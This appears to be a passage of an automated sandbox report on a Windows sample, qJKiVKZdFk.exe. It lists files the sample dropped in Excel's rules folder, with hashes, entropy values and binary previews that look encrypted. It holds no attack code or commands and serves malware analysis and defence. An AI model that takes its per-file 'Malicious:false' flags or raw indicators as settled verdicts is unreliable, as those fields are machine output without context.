                                                                                                                                      SSDEEP:12:52u77X78ipWNezIgpVx6hIMRRqTGd8JztmplTNcF608oat4VqlsTCFukIcii9a:P77LNYUkuqIMKpJKP2Zy4VOsTPbD
                                                                                                                                      MD5:4B9CA1992256A3B97696B8EDEA86F80C
                                                                                                                                      SHA1:201EB7DCEF994EB73F592F51390F2502A6820676
                                                                                                                                      SHA-256:3020BD49EAF492E58FF7276419E32D2F656733BA8717B8493D89D0A2AE015B93
                                                                                                                                      SHA-512:0C4CB7E8D4AAE1AD15EB421C88CC0C264929B012EF609A67AEA9CE505167EC3D8C2AD42F257C0B740A5C175738E3B57B3328C85FA30045443D22D3130EF2ACB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml_..z;b..$. @...Eb1.].&.le...B=..*1$..cKD.Uf..~...\.....J.m..~.K..<...E....Y..Eq8..A..-..(Tl..[..L;^(.....d.......g .dtL2....(..'.cw.[.)K.s........m......l..!L`.......[..5?.^._.D.|i......e?i&+...Y.1K.....{..{?.Q.M....e.Gv.....N3.%93..d..4...-+....naJ..g.....h5`...2D..hXQ....d.z.{a$...Z.3.E./..R=Rj2.U.aXsE.B...k."...T......M.K...`.w..jOh......y...7lSEd..}........w....6..V.R.i.-7..F..cU....t.MvV....t..x..X....B..!v.;..1;8....R...t....n}D...N.........F......n.bwQL.?QwD........9.eAZ...Z.Sw.7....k{...%..O..]XI.].....{B#.'5!...I.=|Y.<\.W..Q..cC....>..%w...z+..^.*...dO|..!..&k....Q.8.g.hap.vA....z.\Ktp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170014v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1707
                                                                                                                                      Entropy (8bit):7.886324838577453
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FpBpLL2ghHW4ro5HRBFfPIMngHuhwU2ts/5aXTgh5GzGwFwOmkEB4rFFkcUdIVIp:FpBVCgRxro5nV+uhwPFgVwzoWFxVYGkD
                                                                                                                                      MD5:47AACB60B3946D724AC7B01CE6FA5A9C
                                                                                                                                      SHA1:45C0FA1B24217117D7B5E41FE31973BF4FB34D33
                                                                                                                                      SHA-256:0BFED3C492440A409B012E575EAD7143BB00C34BFF028C8013BB4FA1F1129153
                                                                                                                                      SHA-512:CB19FF5D6F4EE03C1F56FE8470E431A4E7D926061DA42450E07056A90C42618EEEA463991BE1C74F0AA5B993E675A81E33E6D933E55C8EF7DB0AB2E2AFDF24EC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....eV.M;.q...........9..S-..._i{0.9.V0.H+@.e\..m......f.B3a5h...,Xt.cO.Y,w..5.......'.c[.K...0=^.=.<..P.R.pA<...WA#MO........1...o..G,!.c@....b..LS$.p.u.OB&K..1..@.W.....g.......Km.G.:........q[^.?%7..i&......&.*=.>.Xy......\.w..&t{.....Y.....e....e.d*L......{..*.......+.......qpM....)|..at...N<.~...p...U.i(:x..U..~R0.....*.I.Q^Vy ..l.j..2.0+..=.U49~.u..u.......*%..b\.....4F..`V...........$...If...4ITx.~.....q-....%.m O*.3.....V...l_...F..5.._DvZ.M.f.(.6....RM+k.........&B.c...R..mb.."....[.E..{...B....v..bv`T.R..(.#...R.fm..q..>.'..G *.cT....%..$hd.....t....|L.y0S.m9..m.......S...'.Sy........C..m.8.V..@.#....@8..q.+-6....=../....%..vH.G....mOzT.[.T...b.\."...Z......T.Z..J.!...z.A....`.....l@..].....<xl..lZ.i.J.8\...H#........J.@ .B.....84.s.0.p.o(.].n....C.2....&.$...?....Y....3....P.k.n...Rt.{....d..f..T_.$..x.H.....a:ZF.-...#....;..H...9@..R...W.W.....#.1.....F..,.......Y..G..o[].........z...-.......4k.....#..wD.....2

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170016v7.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2111
                                                                                                                                      Entropy (8bit):7.896924273266795
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:eKX10BgS3KQ/JidBpR9jDXwZ5E3arfHVNJYKepmtnKPFypCwn93D:eW1jSNkBtwZMkfKC4F6d9z
                                                                                                                                      MD5:3E4FE4FBFA255526800F9EB1DD1E230D
                                                                                                                                      SHA1:53FAEF07ED535BF3F4F4F60FCADD4D3AF4D996AC
                                                                                                                                      SHA-256:BDAEEDD7111784BB952059213D12F5A5AB15E0A2BD808DDB88366B0D19412361
                                                                                                                                      SHA-512:7933BEA8B3D06F4CA7F218113A1C4F4ED8B5F61E789A1EA80FB4243005A8D37F5888063EA8FA5FF61E8815F20B433CA1C430F42591C20F455D6BA1C96862EA30
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Na..$.",.P.........<......c.t..a".9t'._.....n...M;U.`6./5l..(Qx.q..@T#;.J.)....VN~.k..#.QX.qy".2..}..aw?a....u..L.....'.F.k.z=.\Kvx,..rA......^A...q......[...f.`.2o......@...*|so)..(.........l.a..;.4u...4..\<..0M.K%.......qp.0....v.#.~...V....d.S..#.y.D....%[&+...v.# .REg..-.A.9[g`3.....2..C.$...~.DJ!.Wpd ..]...Dh.....Jv.8...!....#J1......e.N.(...s[......C2.....G........[)o.........mMcl.c0..V8...V.U.E.....]......N.d...."W.U...X....Sr@....%.9..#t.9.Y.D....}..~sQp.....A...|......xd...ag..._.F..2...H.n.K.E"...2...K.L..Do..K~./.T.........#q.4N.E.....s ...$.F...4w...~[.RnR..8|.t...w...s........J.C...;..z..fv.s}.R.A.e.5*.s.t......f....)..N.7_P...P...........@.l.0.(..JPA..{Q.nb...)[_._.RT.0.q..%?....f........."...k.($...=......cv_.... .D....G4..m^ .s.'..}.yl.134...H.=S4I..-l....%.e. #...~..s5.9...%4....=..&....T.H....>{h{K....H...k.l&....&.w..$ n.....\o...#4.F=."...qyl.u}O.8.1..L\.A..........qJ....z...s...@zL'..{....o.U../..l.:.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170019v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.879254841624832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:+dCIQC/PJGsNgTsLpp19r0x48oh4NlV6wNm3mMomD:LIQcGutZQO8I4Nl/crr
                                                                                                                                      MD5:CA2F8B80E30BD8768F4154993A4240BD
                                                                                                                                      SHA1:C71AF77B06DFD137FD7B8CCA128F68E6234E70DE
                                                                                                                                      SHA-256:51673D439498391BC35544C614DCEF0490A610BA2248A49F595D743363386946
                                                                                                                                      SHA-512:8B6347F2059E5C06468BBDE76FAACFDC85C75ED89604029665A5C7BDCD73196B6C00E93AC70C42DA3363B7503B0027D09CA3D45BEFCE55A2A676AA5AE7B3E12D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml."B...Z....>n)q ......d...+F.s..s...~..I....Wl={..~...[....k.x\{.la.*..."..&f=..$.......n.....P......B(t.Q.1...s...f|.9.dF....nm.'...U...\.:..!.Q.].Q..\z..).n.G5Kb...T.6..(.@.....9.......,.S..^...i.MQ@.9.....w.$....C...1j...O.4...{;......$.~...J..x...I.c..\... ...2j.....gx.....2....".T.....\.-....<..?...&.. w.0k.5..a...~.C...+...b..p..>P.b+..[..".,.AD?...K..xz.....8a......P#....z.*.L.<..c.D.s....P...d. l..th...P`../9...8.WD...i.....'...>.V.J...W.{T1KS.4g.i(....gq%jl....aY{..`0....S.,...8c....#.k....cW8+.qy.z..#.x...j..F.m..lN.f..Xk..N%.....L._..t.n...n.k...7.,$....J._.>f..WS>.....b..F..Q..Yf[xE...........v3...c)....PY.N:.ui.Y.7.=\...D.-.k.....D...N..xU....;.]$.iA..b..........@....^...cw6Va......uG........(..D.......#..Y....%..>..DL?..)~.?\.cw..5..g..X.Cxk....k...6/.t..YId...Q.L....'.OZp...g=.I...c......2.y...0...Twa.7....#....pC*.:.....l....9.....=..3LY.R@]U8.1.1n..h.......g......f.C..2..._Mt...o.*.....s_am....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170021v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):935
                                                                                                                                      Entropy (8bit):7.77560781415639
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ayOCBm80LciUm9dNOp/7MClTTpzlvbxtWqSp4vbD:gCTiciUm9dNOpBT1RxMqTzD
                                                                                                                                      MD5:E630070FAC203367E00D41452D9E1AED
                                                                                                                                      SHA1:7AF0FD1969E4F152D5DEAE11F78211B8B36A943A
                                                                                                                                      SHA-256:FA8E5705843AB987B6E34EEBB678DE83138A6EB714180F96B3EE18A190197887
                                                                                                                                      SHA-512:E092141119BE120643F1148C937015A62439052A2DB0B95AE2D10C0EDC1DBA94BA7D17DD30A6D0B8351F118602AE1F8C20D45E51D3EAC8126DB6CD62E5CC2D8D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....*&..rA...z'.TT\f........e....*.....c......5.nG...!..U;*r........vG..ag"..)!...#...y....eQ).nD'.+b.....3....`'X.J.h....F.....g1.4.T.....%pm^...Y.M..O....R7..V..q.U4e....eC\...|.BE.5lw/.V.u..r.k..<.=4z.[kkm.GCF.(..v.0Q...h........Ti.oH4.7X.......{.-...3...4TWI.C.]I..l..sv ......Kf...o.x,..d..@+...Vnh.'z....8B(:.^EY.....y^......uT.u...VE..0.......d.../o[k~.Y.O.os>..*..5...P.;...-..7N...-*.........&tl....~..p....x.&Jf....@...l9%A..o.v...$+..x`.".Z|.yf.G:-Z..............)Y..%.0/....N2...i.....1.1...[Pm...;.~.G.2....a.s...)d....O....=...Du............^.7F|U..3..N....t...J....qJz.?.y............n._.<.*....9s.[PK.."..i....#.-.80.%y.@.G..[.S...S...E....=.H.j.s!..H.'i..................Cf.'.........I.)....|>........h..]\..O."U.(.&...[.W.!a.N........L......R..@\..Q....vM..Z.i-:U..\C..t.fc.A.... A:a.,tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170022v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):980
                                                                                                                                      Entropy (8bit):7.808644126716969
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:LT2QO7aKqkAzJPh7p1/36XNWh4Sxqzu2KHpAovbD:LKDWKqPLKNWmsROiD
                                                                                                                                      MD5:F2B49D04CD124C72B610D74E6CB1DF0C
                                                                                                                                      SHA1:3B0BF0F12F0EAA1DB240589976C1282A01C9B885
                                                                                                                                      SHA-256:30CF0AE5294411A37818ACCEBC1C473F4CB44DDBC1EC6088B856FF4AC397E777
                                                                                                                                      SHA-512:FF246B5F130D2F94C0AEB2CD0361AE755AD7B5A72C5413AE5BD60BDD809F60E2FA1A05043460B043E6BA17F6518515BF46CE4E40EE455A7EA987F2EC31F14716
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..@...m?..k4.s.pF..@...W.F..@7D.%._...7.F.9..+Z.......H..63....{...v.vP...U..\A............m.ck.."..~.\]a.{?..;6......].T./y.%.9..h...q.[@.3.v~.....6...u.%A..q....*`....tO..q..l..{.)F...-...e.&...g<Y..7~.Y......@.SR.y'...e.u..d=.3Y.T.5..2.q1."c.....<s.$..[.(.GH.!....q).60Y.0..3...Y\..`...^&.j9<...v.C.`qs...S...Ms.vH.......B...O....R.k!.x....Rd.........F.L.j..Z..KT.2.\...IO.(.m+................n.....p1/...8.@.. ...u].ae..]yp*.....Q0.........(.....1.zwQ*.......<W....^.....M...b <tb..h...]G...Z.)4.j.._......0..X.b.=R^.J..xks.w.X.nQ.vT..5>-..r8...&...............n.#|b;8<{N.d.#...^Y8Sw.6..NZ....?..0n.+.]...HS../<..h...E:.)...D..6........=............."..4{..Y.%..._.....$....q.^.A.!T....C....3.a.=kI.(R4d^...s..L.....W"X..RP..i......|...4B...r../z.(.f..4..X...n.M.Od1L....51..........W#...A....N... bC.6%....e.V.5...S.......>....8.4....~....F...M..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170024v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2312
                                                                                                                                      Entropy (8bit):7.916486602929248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:njhN5xkcqs2AWNVcos2EIUVEhom4OKTnJBSUaAD:njhN5Gc2A2JQ7m4OKTJB0c
                                                                                                                                      MD5:A7A7FEACE74DAE875DCD997076BA1DD5
                                                                                                                                      SHA1:4467BBB68F18C055FC262D3FAEDB12AE816BDDDE
                                                                                                                                      SHA-256:DA9B2AF24B5960AE305C7F12A1FB4A5499A6E23A8D707DE916974A506890CFBB
                                                                                                                                      SHA-512:A2652F72A4446F53C689999AA3DCB52A207CA031D9AABF185B5BE6A871E32F3B65701A07123BAC400611714E1B242187C3ECA45A7342CFBFE37A9BE4EA22738D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlS...T..Y.....y5..J.._. .,.-(.[..{.9..!.t.l...>..L9...|......zJ1.N....C..K'..;...v..}......l+#b.......X..`.{y..u....W6......G.................y.u..a........0..Tl.Q.#......T.W..R.......@;..;.|...-_..y!49....T6..8.._%f.f..y.T<zw.<.|....z<.T~..o.Z%.7.[.w../jm.....I..}...'.0m.=. .=._X......*?......l.h...B.......h[$+.......G..X........^.>T....St..1.w...x.o>.....|.......QG!........[.`..\Zd...y..o....R.p..r.L*....O..&.K.aeo..L.R.R..o.+'..x5.....1z:.@....1.#....d.- Cc+.1B.Q}...n2.o..@.Ti5..3..53ijm....9o..F>...B..i.<x......&.u..8....6.].U\.3..j.X6.4....~.......E..m.(!..)a..2..!...._(..R#.<..TW..8..%.k.m..*...lO.|v8(.F..$....8_q..D-i...U.x.n[..)...Z.8......"..;....U..|...c....%.7.wM....+.....}"....%..A.r.x.u...n|....%r.q,....N5....%...2*6.p.7..}......;...eU.....8..pS.J}S.f...$.Qm..\.$$.l`...G.B......NG[I<iC.5.....}......HU.%.....P]...C..*'5...|.).9.[h.5...t,...Iy..b..4OP...jd.3..iP.8..A2n....zU....=C...m.4...{.....7....J?.r.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170026v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1731
                                                                                                                                      Entropy (8bit):7.88939590310583
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FSyPk1yztv7CRIADkrN2YICYL0yvagwfHvwpNyHKfmcXeqUv5d2a/F85V48nF3cX:wyPk1yJvWwrNMujP4Kq+cGd2mF8VnnkD
                                                                                                                                      MD5:5269EB71B6C6499F2267A4C6B6AEFBF5
                                                                                                                                      SHA1:6560D9EAF0BF49A30522947E334F5CDA47775B46
                                                                                                                                      SHA-256:FEBB6082A2D92FDFFD3090659D35DC4A57752BBC5B6A67F9765603C4F6B3A4BB
                                                                                                                                      SHA-512:27B7FCC0BB4C7403CA1ADEFA288423858ED809CB5BACE166800E65BD966E088E66D0AFC34D2B3DEFC6CABF0D6008D20CD1BBFC5D805177F7B1797A39B8B2BA32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....f..y9.....p..e\Mjn....6G...[....;................vte.;h}=....xz...!..+......f. i..Va....I..g.*[..{.S.c...Tj-T*....7....-..X....J.t.O..q...;.........&`..CE.%.....@f.<aw........2....@......}I../...D<.+.x..w...l.>j(Y.=....+.._.Y....aLCruY3.i..A .OZo7?..*.T...|.....;y..7..2..D.X..,.u-.'....cr.....<.}.k...-.u.?iF..9.'.^>...%......F.J5M....wu.......O.:.Y9.]!...11C.4#.)K0..`'Lz& ...7^&..mJ..~M..,..v<.G....~.mB.s3.+...gp.[.>.0.k....d.....5. ..&.3.x.!...{..B.z.....U.K.....l...8FW.d.x.{....x....3...Q--lu.|?....A.....S;...o..q...m..0c./.~...su.,.].qD..s....L.EWA...H..X......W......B..."t.o6......8G....(...tYc..s..t....zd.;@.|k.... .^.....<..T.r.....{e....x.X..z..1...`....w..i.b.H5.u..<2e_4^........).....P.z.q}d....q...:!........z..........g..}7^j..p.{.Xy.GP!.d.....>.9_C...^&....jj|. $.;....CG...^4P..f..I........=..m.4.pK.....nE...g..'.$..U.`....].SxJZ0@6z:..Ms.L..\*..6//...|B......tW.Ay..=.G.....d.z>.v$..p.6/..6.hdX{..C..n3...m.:.5..#....S|z

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170027v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):916
                                                                                                                                      Entropy (8bit):7.753860334565306
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6jflpGPBplIYY5OTLl3kW9ClpwGJYlzL5qZB0Y9RpVYWjMwNlgmXkkGkUDVyukIX:6XGPvOYzz9CzJsNqPVrAuGlkGJDLbD
                                                                                                                                      MD5:3C72557F8B220127588E644B297ED4E5
                                                                                                                                      SHA1:CADB84AEB8E3D1B4E30072A2E15CF499EB5E8E75
                                                                                                                                      SHA-256:0F3342B080258D9066DB9A5F0D27CAD2D1AE792BF48F3F07CDCD98AE13C79E65
                                                                                                                                      SHA-512:896CE5484E14E08A71FF04F254D3AB0A329AA64E5F3EE11007257A165E79CCCFEA7354EB19B6781E52CA1304B35FF378CAF47C40455959091D8ED22BD84EA93C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..d....7J.0.....H..).4}.....P...[......3G>.......$.:.$B.j.......Cg'.d..p......k..x.C......fi.A0.C.].=.k.X...q]...-.]...B..d.....J..../....sOTl..T}.D4...o Y'!;.....Hd.q.G.B%^..J..d.u;~p.n.]....G..z.].V(......KO.d....C....q.Z5....sB.]......p....y~.P....:...x..;B.8..?..Ct%.V.$l..[.U.3./....kA.`N.1.K7..i............-...Y.d...3..;>..:....>...G..S..Z .YG.x..=.k.#.>.^......;. .|U.j...s ...^.";..!.f8...0...A./.........rw.'h40......d..i|1.L...'..SJ.M..&\SF.`iO.z..i,.h....`h...d...|.~..O8..S6x.....~c_.LQ ..x..q.Z.(...O...H.*..W....X.......6....5.:..).......$...9.J...k.}..)F.{tc.f.....`.A..P..Iu+.B..H.FK..(.....H..D~.o.,..(f..F+dw.?PK..G..~1.....;&.....8. ....S.......)y(.I........ .D^F...N.'..$F>...;.C....<..ma.e..... ...$..gm...fa(.x.$%r.w/...0\P]..A.2..*.,js.d....6...)a.^.n....%h.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170030v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):887
                                                                                                                                      Entropy (8bit):7.747609928781473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tG83r98hRPimfx+HwUemkHMlz9yeeOn6xbD:oYybKmfwHGmkHMlz4eP6hD
                                                                                                                                      MD5:1149679D96E26490BDE824424D75E2F0
                                                                                                                                      SHA1:7B6F8AAFE09865E2EDC81B6AA41614DCB5AE79A0
                                                                                                                                      SHA-256:24CBC790166B6B66944EDFEF59793F256F186F498960C8D5B375E460FDC6863F
                                                                                                                                      SHA-512:ADDD29D2FCE74674F744A892ABA569AE4595D13629B6565519F2818ABCE4846054E266F97DB025102F412735AA6CB812FBECCB63A6B394CEE2AF08CB76083769
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...M.$....w..K..]...Q+w2.1.R........RW'g..qkr ..u..lv.n..i..$._L/I..g.3/].Q..}q.9..A......Ki.q._..iT...#.P,........l..r#...3.....i...,......TP.....H......eG..m..._...'......6..T...C.Hd. .%.f.......C.z5@.Y....^.x.5aI..jv..DE.S.5..1..;......F.]H-.C....(([.rH........;X..3[V...{2.7#.h".....a........;...g..VE.......S.@C.P.e...?{M.pLM....e..u{...5Td..R..Y..h.S~i........j}z..lG.._.+.%_.x.f sWQ?SI..K.@...b.....*w.....N+.R#....Z..L2-..{.RC.k_.w....jx.="8D+.I>.i..b..h....P............S...kc@.6....4%.Um. ...2iZ.9.w%..dp..yo.:.........9...\.[.W....Th."r.-...x?.c(E7.-.+S.Tc.1..J..u;Y.M>n.o"......... <.D..u.a.M....b....ecZ...W..1SW..+I..I.....cNX;.I....X.r...4..F.F.h.V.....?k...hdT...aE...iI..4.J..W.W.y.G#.,.<..H...m^..\...>*....^..x.z(..t..-.}.].@...O.+...A.s..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170032v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):975
                                                                                                                                      Entropy (8bit):7.796151583121261
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YHUsgCOO3VTME5GvG7rUqpZgmDHMBQ0cM2S0bD:YnjOZEMvG3Uf2iJcoeD
                                                                                                                                      MD5:E895847C44CBBBB523453E852F8E9639
                                                                                                                                      SHA1:F3AA394C030ABC38D49650722FCF5402AF14218A
                                                                                                                                      SHA-256:B2FEDEECF1A14868DE7B713E8690E7368B408E617FDCB8A1E45F9653494B1B79
                                                                                                                                      SHA-512:1E6254377C6E90B7B5CCEF2CFD46C366343DE23F5818097D81E799C60EA29CF1CA82CB90E301E002CBC9173CB2D39B4FC46989B95B6481302DF2FC204AEB3717
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..L:9.........@.p..B....J..Q..8.2.*%O.\G..H;"...6..*...H..K.}.L..U.u.....<....$..6H.|.......bQ....s.s...5..F.o.5YR........H...F..`.up...+....e.4e.d.b...p....X.j.y#...4.,j.).#Q%....v........?5.......I......8..#..RU......D.V.~..G.f..R....cSC.......MS2s.....B..J0.U#_ g..8.FC..)n.........(L9M]....rND.....I.....o.b.....4.Ym:./..7..w.......w.~.'..$...t....IsY.fL...gH...."..@.P).,...V..Vx...G$v..].Zx<N.6.B..{....K....F...n.a.$..y).............5M.^c..t/w...HD.X...v.<./Re.. .......T..[.|....ft.r..;.....j..w...Z..]-.p.%.........!.gJ.m.E.q..!D3.XS/u..Q .<......w....3..T.(/=...W@.i@..]...7..`Iy........!>.{.+.....m......g...D..I;yu)C...J.9...Y..(n..!Z0.....ss......K.{...q........tkA.$.Wr..34Ak...N.'.TV.....H...d...........z.W....P.S.[.F.........g.|.....W..L.3.|.HC.k...bsQE.aM..N....n.-A....J.C...\..E..5<.&.%THe.gn..a:...A.a.1.0,...h2...A.a..9..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170033v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):719
                                                                                                                                      Entropy (8bit):7.661883768622389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:UCKk6U7U6K3rfSfygcvSzyMPkiBlCv1PI5wanPZfpYAD4qb1gkHPJIina4iQPuk6:UC/6Uo6K3rfSfygeSzlP5TCW5wwPFpPO
                                                                                                                                      MD5:C8A555362804E007DE037FBB62A64501
                                                                                                                                      SHA1:6C788CED7FB02B199D9798126F48979AE4481C5B
                                                                                                                                      SHA-256:A2C751515D8F7FFDC8A37094AA4D3440BDA51A781DAC1BB7351A45D8E6561461
                                                                                                                                      SHA-512:AF5785F1B59F10665428DC15A4E7E5972C647B3364E87599979B2C578AF4AFD73CF0DEE6428BDBF374C295A6256E544A12962EF67D1D3869965351E055D12F72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..^.M...j!.Q.(.....+.%.R....G.x..).C2..G.....{m...nx....x..../y.......jt..+.ct_H.....y.....`...rFo...y2....+(E..`..[.f.i....mZ....l4.m......v..t@.q-....#..gwX-.J.Zb1....W}.q..1..f(o..E.JTd..lSx.}z;s$.s....'bq.)W.....h:.|?%/.s. ?..wMz.B....0..i..o......a..+sV%.7.;'m....q..?;..;x...._......S@.>.hJ...\....8D..DH.0..p.{..g.O.&.r.km..C4...D9/5..P.2)...[W9[...RD...Z~~G......MU........+.....x.p.....,~5..*....m.1.G.......>xwK.|..q.....8`2..n\s!....:....>.......\.z.....o....X..+2..hQ./a9H...e...M.|...*.i..y].I.k..4.{H.H.W..w..(zl........'...ne.A..=.F..W....?X+.0B...>wH.!...fI1z.T`g..w..kT.%4I0;..Htp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170034v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1031
                                                                                                                                      Entropy (8bit):7.784804796223578
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5g/avFMGJrAhIbnGX6K1h85UrCSutEnGYCQbD:5pvpbnGX6KLzCJkGyD
                                                                                                                                      MD5:0AC0105B513CEBAFED597841D7A90222
                                                                                                                                      SHA1:AB3C3F59BB0FA94EF83AF654E45EFFB1E7BCAE58
                                                                                                                                      SHA-256:0901A46C930F86FE8854561308DA3A64C93ED5A25E3775CBA43B9DB42BF710AB
                                                                                                                                      SHA-512:F8941BEC3E05165FD524C1404BB10B9C2AD1DBA5FD8B8DD69518ED466CCB15047FE8B3B189C8A5821DB8E8A33E4E7FDAE717716B554F36696CA43501BC05CC6D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml:)......KA....=?...Q]6.w>.....<.Z<iq..X.A.w4c!..5.9I.,.!...V~hy.....X....T.".::.u.](.PS.Z........mn.UU...Sw.7..k!A.I.L2?.).F.a......pn...J.t*M...y%...V:-)9. ...c...RB..G~..9.. f..}.l.......b.|.?Qcb.8O......P......6..kQ.|..P..k...+V...\..fM.R%u...k-..f......E..k.....q..%.F.hd...."...3.%}.%U.-S.m&...el.m..M..D.9....i.`...e....0}..-]..s...\..k.N..#..:..(c,...ik?..a-..T....%u......7...==4.EZ.{.#.r8.*..)..4.;G....s..^"....|...?~8..........(...".*Jd....../..M....Sk.h.j.....N#.......<...9..71.....4Xj.E4.*...q.....iH._.....2. ..k.......M....(.K....r.5...D..Exr.0...{|!.z..)..W....P....p(Q..Z2.v.g....;.....R.UmaA3..;..B._|...;....G.......9.=.6.Y;S....>;.h8.....Er(IH...i.Q.P\yL......b,.=P...s.+....Ac.X\..^!`|....E.7..N...'.tu....qC..n....X.D.........Q.T.....(..u...Yi....&..U....T...P...<.b5k.&Y.)........X........F....PU..'..D....X(^ld.!... $-.I.W.t.....:.c...O.$.+...(D....W...a=x....{.......F.7.z)..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170035v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1143
                                                                                                                                      Entropy (8bit):7.815686481987425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gTJJoMsNP9tzdnGfK3Ws8CGr6XRpRCdkGefrdruAoIE7eEfpPztCt1SPbD:gTXoM+tdGf8WsUr6XEdkFTda8E7PfNtj
